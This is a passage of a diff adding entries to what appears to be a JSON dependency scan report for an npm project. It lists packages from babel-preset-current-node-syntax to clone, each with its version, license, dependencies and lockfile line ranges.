"StartLine": 6426, + "EndLine": 6434 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-preset-current-node-syntax@1.2.0", + "Name": "babel-preset-current-node-syntax", + "Identifier": { + "PURL": "pkg:npm/babel-preset-current-node-syntax@1.2.0", + "UID": "d8593e9f71cb832f" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/plugin-syntax-async-generators@7.8.4", + "@babel/plugin-syntax-bigint@7.8.3", + "@babel/plugin-syntax-class-properties@7.12.13", + "@babel/plugin-syntax-class-static-block@7.14.5", + "@babel/plugin-syntax-import-attributes@7.27.1", + "@babel/plugin-syntax-import-meta@7.10.4", + "@babel/plugin-syntax-json-strings@7.8.3", + "@babel/plugin-syntax-logical-assignment-operators@7.10.4", + "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", + "@babel/plugin-syntax-numeric-separator@7.10.4", + "@babel/plugin-syntax-object-rest-spread@7.8.3", + "@babel/plugin-syntax-optional-catch-binding@7.8.3", + "@babel/plugin-syntax-optional-chaining@7.8.3", + "@babel/plugin-syntax-private-property-in-object@7.14.5", + "@babel/plugin-syntax-top-level-await@7.14.5" + ], + "Locations": [ + { + "StartLine": 6435, + "EndLine": 6460 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "babel-preset-jest@29.6.3", + "Name": "babel-preset-jest", + "Identifier": { + "PURL": "pkg:npm/babel-preset-jest@29.6.3", + "UID": "8b78b89784a1f2cd" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "babel-plugin-jest-hoist@29.6.3", + "babel-preset-current-node-syntax@1.2.0" + ], + "Locations": [ + { + "StartLine": 6461, + "EndLine": 6476 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "balanced-match@1.0.2", + "Name": "balanced-match", + "Identifier": { + "PURL": "pkg:npm/balanced-match@1.0.2", + "UID": "f9cc37abb6c3bcd3" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6477, + "EndLine": 6482 + }, + { + "StartLine": 14045, + "EndLine": 14051 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bare-events@2.7.0", + "Name": "bare-events", + "Identifier": { + "PURL": "pkg:npm/bare-events@2.7.0", + "UID": "e037ce945c76a08b" + }, + "Version": "2.7.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6483, + "EndLine": 6488 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bare-fs@4.4.5", + "Name": "bare-fs", + "Identifier": { + "PURL": "pkg:npm/bare-fs@4.4.5", + "UID": "5a5c32c1e3e5774d" + }, + "Version": "4.4.5", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bare-events@2.7.0", + "bare-path@3.0.0", + "bare-stream@2.7.0", + "bare-url@2.2.2", + "fast-fifo@1.3.2" + ], + "Locations": [ + { + "StartLine": 6489, + "EndLine": 6513 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bare-os@3.6.2", + "Name": "bare-os", + "Identifier": { + "PURL": "pkg:npm/bare-os@3.6.2", + "UID": "21fcff5a0651f1fb" + }, + "Version": "3.6.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6514, + "EndLine": 6523 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bare-path@3.0.0", + "Name": "bare-path", + "Identifier": { + "PURL": "pkg:npm/bare-path@3.0.0", + "UID": "4830c15dee9a36af" + }, + "Version": "3.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bare-os@3.6.2" + ], + "Locations": [ + { + "StartLine": 6524, + "EndLine": 6533 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bare-stream@2.7.0", + "Name": "bare-stream", + "Identifier": { + "PURL": "pkg:npm/bare-stream@2.7.0", + "UID": "fca91e2b199e7429" + }, + "Version": "2.7.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bare-events@2.7.0", + "streamx@2.23.0" + ], + "Locations": [ + { + "StartLine": 6534, + "EndLine": 6555 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bare-url@2.2.2", + "Name": "bare-url", + "Identifier": { + "PURL": "pkg:npm/bare-url@2.2.2", + "UID": "a3ee2692532c915b" + }, + "Version": "2.2.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bare-path@3.0.0" + ], + "Locations": [ + { + "StartLine": 6556, + "EndLine": 6565 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "base-64@0.1.0", + "Name": "base-64", + "Identifier": { + "PURL": "pkg:npm/base-64@0.1.0", + "UID": "5b9d1fe9b91dadda" + }, + "Version": "0.1.0", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17501, + "EndLine": 17505 + }, + { + "StartLine": 17810, + "EndLine": 17814 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "base64-arraybuffer@1.0.2", + "Name": "base64-arraybuffer", + "Identifier": { + "PURL": "pkg:npm/base64-arraybuffer@1.0.2", + "UID": "f23f66b2874f2051" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6572, + "EndLine": 6580 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "base64-js@1.5.1", + "Name": "base64-js", + "Identifier": { + "PURL": "pkg:npm/base64-js@1.5.1", + "UID": "8f7eb4a5b2e2f4af" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6581, + "EndLine": 6600 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "baseline-browser-mapping@2.8.13", + "Name": "baseline-browser-mapping", + "Identifier": { + "PURL": "pkg:npm/baseline-browser-mapping@2.8.13", + "UID": "aa8dfb62c7ab348a" + }, + "Version": "2.8.13", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6601, + "EndLine": 6609 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "big-integer@1.6.52", + "Name": "big-integer", + "Identifier": { + "PURL": "pkg:npm/big-integer@1.6.52", + "UID": "2e697d0697b9b2f2" + }, + "Version": "1.6.52", + "Licenses": [ + "Unlicense" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6610, + "EndLine": 6618 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bin-links@5.0.0", + "Name": "bin-links", + "Identifier": { + "PURL": "pkg:npm/bin-links@5.0.0", + "UID": "23a3cef4105085ed" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cmd-shim@7.0.0", + "npm-normalize-package-bin@4.0.0", + "proc-log@5.0.0", + "read-cmd-shim@5.0.0", + "write-file-atomic@6.0.0" + ], + "Locations": [ + { + "StartLine": 14052, + "EndLine": 14066 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "binary-extensions@3.1.0", + "Name": "binary-extensions", + "Identifier": { + "PURL": "pkg:npm/binary-extensions@3.1.0", + "UID": "2029d0181aff0af9" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14067, + "EndLine": 14079 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bindings@1.5.0", + "Name": "bindings", + "Identifier": { + "PURL": "pkg:npm/bindings@1.5.0", + "UID": "f11dbbca34a94b29" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "file-uri-to-path@1.0.0" + ], + "Locations": [ + { + "StartLine": 6619, + "EndLine": 6628 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bl@4.1.0", + "Name": "bl", + "Identifier": { + "PURL": "pkg:npm/bl@4.1.0", + "UID": "3e64fa245fde0405" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "buffer@5.7.1", + "inherits@2.0.4", + "readable-stream@3.6.2" + ], + "Locations": [ + { + "StartLine": 6629, + "EndLine": 6639 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "body-parser@1.20.3", + "Name": "body-parser", + "Identifier": { + "PURL": "pkg:npm/body-parser@1.20.3", + "UID": "14732633cdda79aa" + }, + "Version": "1.20.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bytes@3.1.2", + "content-type@1.0.5", + "debug@2.6.9", + "depd@2.0.0", + "destroy@1.2.0", + "http-errors@2.0.0", + "iconv-lite@0.4.24", + "on-finished@2.4.1", + "qs@6.13.0", + "raw-body@2.5.2", + "type-is@1.6.18", + "unpipe@1.0.0" + ], + "Locations": [ + { + "StartLine": 6640, + "EndLine": 6664 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "boolbase@1.0.0", + "Name": "boolbase", + "Identifier": { + "PURL": "pkg:npm/boolbase@1.0.0", + "UID": "4d1c85c37d9e5c99" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6682, + "EndLine": 6687 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bplist-creator@0.1.0", + "Name": "bplist-creator", + "Identifier": { + "PURL": "pkg:npm/bplist-creator@0.1.0", + "UID": "e107d46188b2b1ea" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "stream-buffers@2.2.0" + ], + "Locations": [ + { + "StartLine": 6688, + "EndLine": 6696 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bplist-parser@0.3.1", + "Name": "bplist-parser", + "Identifier": { + "PURL": "pkg:npm/bplist-parser@0.3.1", + "UID": "892ce16eed98915f" + }, + "Version": "0.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "big-integer@1.6.52" + ], + "Locations": [ + { + "StartLine": 6697, + "EndLine": 6708 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "brace-expansion@1.1.12", + "Name": "brace-expansion", + "Identifier": { + "PURL": "pkg:npm/brace-expansion@1.1.12", + "UID": "84bc3c1c5bf9dc3f" + }, + "Version": "1.1.12", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "balanced-match@1.0.2", + "concat-map@0.0.1" + ], + "Locations": [ + { + "StartLine": 2273, + "EndLine": 2283 + }, + { + "StartLine": 3265, + "EndLine": 3275 + }, + { + "StartLine": 8744, + "EndLine": 8754 + }, + { + "StartLine": 8833, + "EndLine": 8843 + }, + { + "StartLine": 9768, + "EndLine": 9777 + }, + { + "StartLine": 20569, + "EndLine": 20578 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "brace-expansion@2.0.2", + "Name": "brace-expansion", + "Identifier": { + "PURL": "pkg:npm/brace-expansion@2.0.2", + "UID": "17232eb9182a44a1" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "balanced-match@1.0.2" + ], + "Locations": [ + { + "StartLine": 6709, + "EndLine": 6717 + }, + { + "StartLine": 14080, + "EndLine": 14089 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "braces@3.0.3", + "Name": "braces", + "Identifier": { + "PURL": "pkg:npm/braces@3.0.3", + "UID": "a4969d4920314eb0" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fill-range@7.1.1" + ], + "Locations": [ + { + "StartLine": 6718, + "EndLine": 6729 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "browserslist@4.26.3", + "Name": "browserslist", + "Identifier": { + "PURL": "pkg:npm/browserslist@4.26.3", + "UID": "c3329e15836b09c1" + }, + "Version": "4.26.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "baseline-browser-mapping@2.8.13", + "caniuse-lite@1.0.30001749", + "electron-to-chromium@1.5.233", + "node-releases@2.0.23", + "update-browserslist-db@1.1.3" + ], + "Locations": [ + { + "StartLine": 6730, + "EndLine": 6762 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bser@2.1.1", + "Name": "bser", + "Identifier": { + "PURL": "pkg:npm/bser@2.1.1", + "UID": "6be90a34d9caad67" + }, + "Version": "2.1.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "node-int64@0.4.0" + ], + "Locations": [ + { + "StartLine": 6763, + "EndLine": 6771 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "buffer@5.7.1", + "Name": "buffer", + "Identifier": { + "PURL": "pkg:npm/buffer@5.7.1", + "UID": "744995c58092a459" + }, + "Version": "5.7.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@1.5.1", + "ieee754@1.2.1" + ], + "Locations": [ + { + "StartLine": 6772, + "EndLine": 6795 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "buffer@6.0.3", + "Name": "buffer", + "Identifier": { + "PURL": "pkg:npm/buffer@6.0.3", + "UID": "f36da97105673782" + }, + "Version": "6.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "base64-js@1.5.1", + "ieee754@1.2.1" + ], + "Locations": [ + { + "StartLine": 18249, + "EndLine": 18272 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "buffer-from@1.1.2", + "Name": "buffer-from", + "Identifier": { + "PURL": "pkg:npm/buffer-from@1.1.2", + "UID": "9f602163a25706ea" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6796, + "EndLine": 6801 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "bytes@3.1.2", + "Name": "bytes", + "Identifier": { + "PURL": "pkg:npm/bytes@3.1.2", + "UID": "510ce57d47ae4e5" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6802, + "EndLine": 6811 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cacache@15.3.0", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@15.3.0", + "UID": "e922abb5ac83b132" + }, + "Version": "15.3.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/fs@1.1.1", + "@npmcli/move-file@1.1.2", + "chownr@2.0.0", + "fs-minipass@2.1.0", + "glob@7.2.3", + "infer-owner@1.0.4", + "lru-cache@6.0.0", + "minipass-collect@1.0.2", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "minipass@3.3.6", + "mkdirp@1.0.4", + "p-map@4.0.0", + "promise-inflight@1.0.1", + "rimraf@3.0.2", + "ssri@8.0.1", + "tar@6.2.1", + "unique-filename@1.1.1" + ], + "Locations": [ + { + "StartLine": 6812, + "EndLine": 6841 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cacache@19.0.1", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@19.0.1", + "UID": "ae6be16eb134c35b" + }, + "Version": "19.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/fs@4.0.0", + "fs-minipass@3.0.3", + "glob@10.4.5", + "lru-cache@10.4.3", + "minipass-collect@2.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "minipass@7.1.2", + "p-map@7.0.3", + "ssri@12.0.0", + "tar@7.5.1", + "unique-filename@4.0.0" + ], + "Locations": [ + { + "StartLine": 14996, + "EndLine": 15017 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cacache@20.0.1", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@20.0.1", + "UID": "238cf185c2a5e1b5" + }, + "Version": "20.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/fs@4.0.0", + "fs-minipass@3.0.3", + "glob@11.0.3", + "lru-cache@11.2.2", + "minipass-collect@2.0.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "minipass@7.1.2", + "p-map@7.0.3", + "ssri@12.0.0", + "unique-filename@4.0.0" + ], + "Locations": [ + { + "StartLine": 14090, + "EndLine": 14110 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "call-bind@1.0.8", + "Name": "call-bind", + "Identifier": { + "PURL": "pkg:npm/call-bind@1.0.8", + "UID": "cd4e2f349802efbb" + }, + "Version": "1.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-define-property@1.0.1", + "get-intrinsic@1.3.0", + "set-function-length@1.2.2" + ], + "Locations": [ + { + "StartLine": 6885, + "EndLine": 6902 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "call-bind-apply-helpers@1.0.2", + "Name": "call-bind-apply-helpers", + "Identifier": { + "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", + "UID": "afd95aa864fbe250" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-errors@1.3.0", + "function-bind@1.1.2" + ], + "Locations": [ + { + "StartLine": 6903, + "EndLine": 6915 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "call-bound@1.0.4", + "Name": "call-bound", + "Identifier": { + "PURL": "pkg:npm/call-bound@1.0.4", + "UID": "50a02cd41b88b264" + }, + "Version": "1.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "get-intrinsic@1.3.0" + ], + "Locations": [ + { + "StartLine": 6916, + "EndLine": 6931 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "callsites@3.1.0", + "Name": "callsites", + "Identifier": { + "PURL": "pkg:npm/callsites@3.1.0", + "UID": "aa23fea53b89c280" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6932, + "EndLine": 6940 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "camelcase@5.3.1", + "Name": "camelcase", + "Identifier": { + "PURL": "pkg:npm/camelcase@5.3.1", + "UID": "c1946f8cc4d08aa1" + }, + "Version": "5.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6941, + "EndLine": 6949 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "camelcase@6.3.0", + "Name": "camelcase", + "Identifier": { + "PURL": "pkg:npm/camelcase@6.3.0", + "UID": "eaab30be338fc9e" + }, + "Version": "6.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5144, + "EndLine": 5155 + }, + { + "StartLine": 11529, + "EndLine": 11540 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "camelcase-keys@6.2.2", + "Name": "camelcase-keys", + "Identifier": { + "PURL": "pkg:npm/camelcase-keys@6.2.2", + "UID": "dfc9b1ac78d84f2e" + }, + "Version": "6.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "camelcase@5.3.1", + "map-obj@4.3.0", + "quick-lru@4.0.1" + ], + "Locations": [ + { + "StartLine": 6950, + "EndLine": 6966 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "camelize@1.0.1", + "Name": "camelize", + "Identifier": { + "PURL": "pkg:npm/camelize@1.0.1", + "UID": "c2c3ee613896103d" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6967, + "EndLine": 6975 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "caniuse-lite@1.0.30001749", + "Name": "caniuse-lite", + "Identifier": { + "PURL": "pkg:npm/caniuse-lite@1.0.30001749", + "UID": "63d0b7541ec121fa" + }, + "Version": "1.0.30001749", + "Licenses": [ + "CC-BY-4.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6976, + "EndLine": 6995 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chalk@2.4.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@2.4.2", + "UID": "4b96096f755e32ac" + }, + "Version": "2.4.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@3.2.1", + "escape-string-regexp@1.0.5", + "supports-color@5.5.0" + ], + "Locations": [ + { + "StartLine": 510, + "EndLine": 523 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chalk@4.1.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@4.1.2", + "UID": "3c204e3cae930544" + }, + "Version": "4.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-styles@4.3.0", + "supports-color@7.2.0" + ], + "Locations": [ + { + "StartLine": 6996, + "EndLine": 7011 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chalk@5.6.2", + "Name": "chalk", + "Identifier": { + "PURL": "pkg:npm/chalk@5.6.2", + "UID": "17ae292f34337db5" + }, + "Version": "5.6.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14111, + "EndLine": 14123 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chownr@1.1.4", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@1.1.4", + "UID": "7a5ab81f825d9d52" + }, + "Version": "1.1.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7022, + "EndLine": 7027 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chownr@2.0.0", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@2.0.0", + "UID": "8a8ab1f8d88b8568" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 6842, + "EndLine": 6851 + }, + { + "StartLine": 20494, + "EndLine": 20503 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chownr@3.0.0", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@3.0.0", + "UID": "bf56de3f45c803ad" + }, + "Version": "3.0.0", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14124, + "EndLine": 14133 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chrome-launcher@0.15.2", + "Name": "chrome-launcher", + "Identifier": { + "PURL": "pkg:npm/chrome-launcher@0.15.2", + "UID": "b7aff604ca2abf1f" + }, + "Version": "0.15.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0", + "escape-string-regexp@4.0.0", + "is-wsl@2.2.0", + "lighthouse-logger@1.4.2" + ], + "Locations": [ + { + "StartLine": 7028, + "EndLine": 7045 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "chromium-edge-launcher@0.2.0", + "Name": "chromium-edge-launcher", + "Identifier": { + "PURL": "pkg:npm/chromium-edge-launcher@0.2.0", + "UID": "6bbedde05b10c4fd" + }, + "Version": "0.2.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0", + "escape-string-regexp@4.0.0", + "is-wsl@2.2.0", + "lighthouse-logger@1.4.2", + "mkdirp@1.0.4", + "rimraf@3.0.2" + ], + "Locations": [ + { + "StartLine": 7058, + "EndLine": 7071 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ci-info@2.0.0", + "Name": "ci-info", + "Identifier": { + "PURL": "pkg:npm/ci-info@2.0.0", + "UID": "8a5ea06fe4001f57" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12692, + "EndLine": 12697 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ci-info@3.9.0", + "Name": "ci-info", + "Identifier": { + "PURL": "pkg:npm/ci-info@3.9.0", + "UID": "c44076bdcc294b59" + }, + "Version": "3.9.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7084, + "EndLine": 7098 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ci-info@4.3.1", + "Name": "ci-info", + "Identifier": { + "PURL": "pkg:npm/ci-info@4.3.1", + "UID": "b4b54d318fdc6e22" + }, + "Version": "4.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14134, + "EndLine": 14147 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cidr-regex@5.0.1", + "Name": "cidr-regex", + "Identifier": { + "PURL": "pkg:npm/cidr-regex@5.0.1", + "UID": "a455674c13a4f262" + }, + "Version": "5.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ip-regex@5.0.0" + ], + "Locations": [ + { + "StartLine": 14148, + "EndLine": 14158 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "clean-stack@2.2.0", + "Name": "clean-stack", + "Identifier": { + "PURL": "pkg:npm/clean-stack@2.2.0", + "UID": "e7766c2251b54e87" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7106, + "EndLine": 7115 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cli-columns@4.0.0", + "Name": "cli-columns", + "Identifier": { + "PURL": "pkg:npm/cli-columns@4.0.0", + "UID": "dd3df0023ce5c9c" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 14159, + "EndLine": 14170 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cli-cursor@3.1.0", + "Name": "cli-cursor", + "Identifier": { + "PURL": "pkg:npm/cli-cursor@3.1.0", + "UID": "42454490fdb97bc8" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "restore-cursor@3.1.0" + ], + "Locations": [ + { + "StartLine": 7116, + "EndLine": 7127 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cli-spinners@2.9.2", + "Name": "cli-spinners", + "Identifier": { + "PURL": "pkg:npm/cli-spinners@2.9.2", + "UID": "d149e82a5f2e9def" + }, + "Version": "2.9.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7128, + "EndLine": 7139 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cliui@6.0.0", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@6.0.0", + "UID": "58d5128185adf905" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wrap-ansi@6.2.0" + ], + "Locations": [ + { + "StartLine": 11935, + "EndLine": 11946 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cliui@7.0.4", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@7.0.4", + "UID": "319c005b7103f44b" + }, + "Version": "7.0.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wrap-ansi@7.0.0" + ], + "Locations": [ + { + "StartLine": 18495, + "EndLine": 18505 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "cliui@8.0.1", + "Name": "cliui", + "Identifier": { + "PURL": "pkg:npm/cliui@8.0.1", + "UID": "d0867e9c8a7a1f74" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wrap-ansi@7.0.0" + ], + "Locations": [ + { + "StartLine": 7140, + "EndLine": 7153 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "clone@1.0.4", 